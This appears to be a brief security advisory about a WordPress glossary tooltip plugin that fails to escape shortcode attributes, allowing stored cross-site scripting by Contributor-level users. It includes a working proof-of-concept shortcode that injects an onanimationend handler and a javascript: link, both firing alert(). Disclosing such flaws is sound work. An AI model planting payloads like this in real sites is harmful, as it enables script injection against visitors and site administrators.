The plugin does not escape some glossary_tooltip shortcode attributes, which could allow users a role as low as Contributor to perform Stored Cross-Site Scripting attacks
[glossary_tooltip dashicon='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS-enhanced-tooltipglossary_dashicon/)//' link="javascript:alert(/XSS-enhanced-tooltipglossary_link/)"]Click me[/glossary_tooltip]